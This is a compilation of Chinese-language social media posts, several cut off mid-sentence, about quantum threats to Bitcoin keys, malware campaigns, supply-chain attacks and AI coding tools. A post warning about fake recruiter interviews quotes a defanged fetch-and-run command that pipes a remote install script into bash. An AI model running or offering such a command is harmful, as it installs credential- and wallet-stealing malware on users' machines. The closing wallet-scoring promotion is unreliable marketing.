TheSmartApe🔥

你告诉我，七个月前，一台量子计算机破解了一个6位的椭圆曲线密钥。
上周，一位研究人员破解了15位的密钥，而比特币使用的是256位？
每个比特币钱包都由ecdsa保护，椭圆曲线数字签名算法。
你的私钥是你币的唯一钥匙。你的公钥是锁的序列号，所有人都能看到。
从公钥，你无法推导出私钥。这就是为什么你的比特币属于你的原因。
量子计算机可以破解这个。Shor的算法，在量子硬件上运行，可以从公钥计算出私钥。
这已经被证明了。唯一未解的问题是，能破解多大密钥的大小。
> 2025年9月：首次公开演示，6位密钥
> 2026年4月：Giancarlo Lelli用27个量子比特在45分钟内破解了15位密钥，赢得1比特币悬赏
这是7个月内512倍的飞跃。比特币使用256位。还剩241位。
听起来很遥远。其实并不。
谷歌2026年4月的白皮书估算，破解一个真正比特币密钥大约需要50万颗物理量子比特。
加州理工学院和Oratomic的一篇后续论文将这个估算降低到大约1万颗中性原子量子比特。
目前的硬件：IBM拥有超过1000个量子比特的机器。Atom Computing已展示了由1000多个中性原子组成的阵列。IBM计划到2026年底实现超过1万颗模块化量子比特。
“我们拥有的”和“所需的”之间的差距曾经是一堵墙。研究人员自己现在称之为“一个工程

当心假招聘面试。它们现在已成为最干净的恶意软件传播途径之一。
我兄弟这周差点中招。
步骤如下：
> 一个“招聘官”在领英上联系他
> 他们实际上已经阅读了他的简历，知道他的技术栈。他们预订了一个真实的面试时间。
> 面试前几小时：“你能在我们谈话前快速浏览一下我们的产品页面吗？”
> 访问该网站时，后台会运行以下内容：
curl -s macos[.]hyperhives[.]net/install | nohup bash &
如果你在提示时输入密码，就完了。
一位研究员(Darksp33d在Github)反向工程了这个二进制文件：
> 每个配置字符串都用570个独特的自定义函数加密
> 解包后：完整的C2服务器、端点列表，以及一个与开发者在法律传票下相关联的sentry错误追踪dsn
> 276个目标Chrome扩展ID，涵盖188个加密钱包
> 与朝鲜“传染性面试”攻击的TTP重叠很强
> virustotal评分9/64。CrowdStrike、Sophos、Malwarebytes都未检测到
真正的招聘官、真实的简历、真实的面试时间、看似真实的网站。一行curl就能掏空你的钱包。
如果“招聘官”让你在终端运行任何东西，即使是看似无害的构建脚本，也要关闭标签页。

大家都错过了这个。几天前，bitwarden cli (作为最大的密码管理器之一)在npm上被植入后门。
存在了93分钟。334名开发者在有人注意到之前就已安装。
事情的经过：
> 攻击者劫持了一名bitwarden工程师的github账户
> 推送了一个恶意版本的npm包(@bitwarden/cli@2026.4.0)。
> 在此期间运行npm install bitwarden/cli的任何人都拉取了后门。
安装脚本并未直接携带恶意软件。它从github的官方发布端点下载了bun运行时，因此网络流量看起来100%合法。然后bun执行了真正的载荷，bw1.js。
被窃取的内容：
> npm令牌
> github令牌
> ssh密钥
> aws / gcp / azure凭证
> .env文件的内容
> 来自claude code和codex cli的mcp配置文件(是的，AI助手的秘密现在也成为战利品的一部分)

伊朗表示在战争期间一些设备重启，而他们与全球网络断开连接。
假设：固件或引导加载程序的后门，由卫星触发。
它的工作原理：
> 代码植入在操作系统以下的固件或引导加载程序中
> 处于休眠状态。对标准监控工具不可见。
> 监听触发信号：定时器、畸形数据包或带外信号
> 触发时，运行预加载的载荷
> 重启会清除大部分证据
此时验证变得不可能，但保持警惕是有益的。

🚨 快讯：有人刚刚用人工智能入侵了 @hyperbridge，并带走了 $237K。
攻击者使用 AI 生成了一条看似合法的伪造信息，发给桥。就像一封完美伪造的信，上面写着“我现在是新经理了。”而桥相信了这条信息。
一旦“晋升”为管理员，攻击者就在以太坊上凭空铸造了 1 billion $DOT tokens，并在没人注意到之前把它们全部倾倒/抛售了 $237K 。
→ AI 生成伪造的跨链消息
→ 消息通过 hyperbridge 的网关传输
→ 桥认为它是真的并执行
→ 攻击者成为代币合约的管理员
→ 铸造 1B 代币
→ 出售一切
→ 消失
过去，想要制作一条看起来有效的跨链消息，需要数周的手动逆向工程。
现在，LLM（大型语言模型）可以分析合约，找出薄弱的校验逻辑，并在数小时内生成“完美”的伪造载荷。
而最讽刺的部分呢？
hyperbridge 竟然在 4 月 1 日发布了一篇帖子，名为“The Hyperbridge Hack Explained”，还用作玩笑。
他们在炫耀自己的 ZK proof 系统如何让他们“无法被黑”。
12 天后，有人证明他们错了。

如果你没装这10个 claude 插件，别告诉我你用 claude 用得高效。
没有插件的 claude = 一台没有手臂的大脑。
𝟭. feature-dev
描述一个功能 → claude 运行完整的开发流程：需求、架构、代码、测试、评审、文档。不是代码片段生成器。一个初级工程师。
→ npx skills add anthropic/feature-dev
𝟮. frontend-design
阻止 claude 编写那种通用的“看起来像 AI 的”界面。让它具备真正的设计直觉、不对称布局、有意图的排版、滚动动画。
→ npx skills add anthropic/frontend-design
𝟯. context7
claude 的训练数据是几个月前的。context7 会为你使用的库的精确版本获取实时文档。不再出现胡编的 API。
→ 通过在 claude desktop 中的 MCP 配置添加
𝟰. github mcp
在聊天中搜索仓库、阅读代码、打开问题、创建 PR，全都可以。 “修复 issue #42” → claude 读取代码、提出修复方案，并打开 PR。
→ 在 anthropic 的官方市场中提供
𝟱. postgresql mcp
问“上个月花费最多的前5个用户” → clau

代理记忆问题刚刚得到解决。它免费且易于使用。
这个项目叫做 mempalace。
这个想法很简单：
大多数记忆系统试图判断什么重要，进行总结，并且只存储这些内容。
mempalace 做的事情是：
存储一切，然后让它可以被搜索。
它不是提取类似下面这些内容：
• “用户偏好 postgres”
• “项目使用 graphql”
然后把发生真正推理的那段对话丢掉，
而是原封不动地保留原始交流内容，并使用语义搜索在之后检索到正确的记忆。
所以你保留的是“为什么”，而不仅仅是总结。
它是如何工作的：
> 所有内容都保持本地
> 它将你的数据存储在 ChromaDB 中
> 它把记忆组织成一种他们称为“宫殿”的结构
> 然后你的代理在需要时就能搜索这部分记忆
如何使用它：
1. 安装 mempalace
2. 在你的项目中初始化它
3. 挖掘你的聊天/文档/代码库
4. 通过 MCP 将它连接到你的 AI
5. 从那一刻起，你的代理就可以自动查询你过去的决策
他们还宣称：在 LongMemEval 的原始模式下，本地实现 96.6% 的成绩，且无需任何 API 调用。
所以基本上就是：
• 本地记忆
• 没有云端
• 没有订阅
• 没有总结导致上下文被破坏
• 只在你的代理需

以下是创建一个随着时间自我改进并帮助你生成更精致网页应用的提示文件的方法。
1. 使用Playwright MCP服务器将Claude连接到你的应用
2. 将你的组件生成规则存储在一个文件中
例如：src/lib/prompts/generation.tsx
3. 让Claude执行以下操作：
• 打开localhost
• 生成一个组件
• 审查实际的视觉输出
• 更新提示文件
• 重新生成并进行对比
示例提示：
“导航到localhost[:]3000，生成一个基础组件，审查样式，并更新src/lib/prompts/generation.tsx，以便今后生成更好的组件”
这样就可以避免反复使用类似的通用模式，比如：
• 紫蓝色渐变
• 居中的英雄区块
• 默认的Tailwind对称布局
它可以引导提示朝着：
• 更温暖的色彩体系
• 更具原创性的间距
• 非对称布局
• 更好的视觉层次
• 更少“AI风格”的组件
如果你想将AI组件生成变成一个真正的设计流程，这个模式非常实用。

如何在不向你的代理提供1000条设计指令的情况下获得专业的网站设计？
你只需要一个GitHub仓库：awesome-design-md。
不用每次都试图用提示描述整个视觉风格，你只需给代理一个DESIGN[.]md。
就像AGENTS[.]md告诉代理如何构建一样，DESIGN[.]md告诉它产品应该长什么样。
这个仓库基本上是从真实面向开发者的网站中提取的DESIGN[.]md文件的精选库。
具体使用方法：
1. 进入仓库
2. 选择你喜欢的风格
3. 将该网站的DESIGN[.]md复制到你的项目根目录
4. 让你的编码代理使用该文件进行构建
5. 如有需要，可以调整DESIGN[.]md，而不用重写大量提示

我见过的更实用的Claude代码项目之一。
它将Claude变成一个完整的求职操作系统：
> 评分职位
> 为每个岗位定制简历
> 扫描招聘门户
> 批量处理申请
> 在一个流程中跟踪所有内容
具体使用方法：
1. 克隆仓库 + 安装依赖
2. 添加你的个人资料配置
3. 将你的简历放入cv[.]md
4. 在仓库中打开Claude Code
5. 粘贴职位链接或职位描述
6. 运行完整流程：评估、定制简历、更新跟踪器
很好的提醒，目前一些最好的AI产品其实只是：
围绕高摩擦决策构建的结构化工作流程。

目前Dispatch + Cowork的主要问题：你不能为不同的项目同时进行多场对话。
Cowork可以处理后台会话，但作为用户，你被限制在一个会话中。
如果我在处理内容流程的同时，想要同时迭代一个交易机器人，我需要与不同的会话进行不同的上下文交流。
不能所有内容都通过一个Dispatch线程路由。
Anthropic应该添加每个项目的专属线程。每个项目文件夹都应拥有自己的会话、自己的记忆和上下文。
这不应该很难，基础架构已经存在，项目和文件夹选择已经实现。只需要一个合适的多线程用户体验。

我已将整个 openclaw 架构迁移到 cowork + dispatch。
以下是用于将 dispatch 用于迁移每个 openclaw 文件夹的提示：
“我在 [path] 有一个项目目录。读取其中的所有文件，包括上下文、记忆、指令等。然后在 ~/Documents/[project-name]/ 中创建一条单一的 INSTRUCTIONS，用于把所有相关内容整合到一个干净的文件中，供我用 Cowork 使用。只保留与项目目标直接相关的内容，跳过任何无关的部分。”
1 个文件夹 = 1 条 INSTRUCTIONS。当你用该文件夹在 cowork 中打开时，它就会包含所有上下文。

如你所知，我是@Tok_Edge的聪明资金，你的评分是多少？
我在调查这个项目背后的人。我们说的是牛津经济学家、$10bn 基金的管理合伙人，拥有8年的加密货币经验。
这些都不是随机的散户，他们通过推介材料筹集了种子轮资金。他们实际上管理过真实的资金。我让你自己去了解剩下的部分。顺便说一句，他们100%知道谁是真正的聪明资金。
我还用它测试了很多钱包，评分不在乎你的持仓有多大。关键在于你的交易方式，而不是你持有多少。没有鲸鱼优势。一个四位数的钱包如果操作得当，可以比七位数的钱包更优。这很少见。你知道一些你想检查的钱包吗？
检查几乎不花钱。扫描你的钱包，看看你的排名，上传你的分享卡。最坏的情况，你会了解一些关于自己交易习惯的事情。